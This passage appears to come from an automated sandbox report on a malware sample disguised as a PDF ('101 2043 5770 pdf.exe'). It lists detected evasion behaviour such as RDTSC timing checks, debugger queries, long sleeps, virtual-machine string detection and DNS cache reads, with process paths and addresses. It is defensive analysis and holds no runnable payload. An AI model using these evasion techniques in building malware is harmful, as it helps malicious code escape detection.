Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Reads the DNS cache

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE3872 DnsGetCacheDataTableEx,DnsFree,DnsFree,

9_2_00DE3872

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D744

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49904 second address: C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49B7E second address: C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09904 second address: C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09B7E second address: C09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9904 second address: 2CC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9B7E second address: 2CC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: 29D371B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 2653FB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 1EBFD450000 memory reserve \| memory write watch

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5190	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4752	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 771	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 744	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 1671	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 8297	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3699

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API coverage: 2.2 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 2.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -10380000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -9504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 1671 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -3342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 8297 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -16594000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976	Thread sleep time: -4611686018427385s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7861C90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7D7861C90

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000007.00000000.2132972491.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000000.2132377434.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000007.00000002.4602699260.000000000C377000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Contains functionality to read the PEB

